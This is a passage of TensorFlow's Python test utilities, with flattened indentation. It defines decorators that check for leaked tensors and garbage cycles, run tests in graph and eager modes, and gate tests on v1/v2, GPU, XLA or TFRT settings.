# Since we aren't in the normal test lifecylce, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
# unittest.doCleanups adds to self._outcome with each unwound call.
# These objects are retained across gc collections so we exclude them
# from the object count calculation.
obj_count_by_type = _get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped))
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecylce, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = (
_get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped)) -
obj_count_by_type)
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
For example,
>>> gpu_available = tf.test.is_gpu_available()
>>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
>>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if tfrt_utils.enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if tfrt_utils.enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
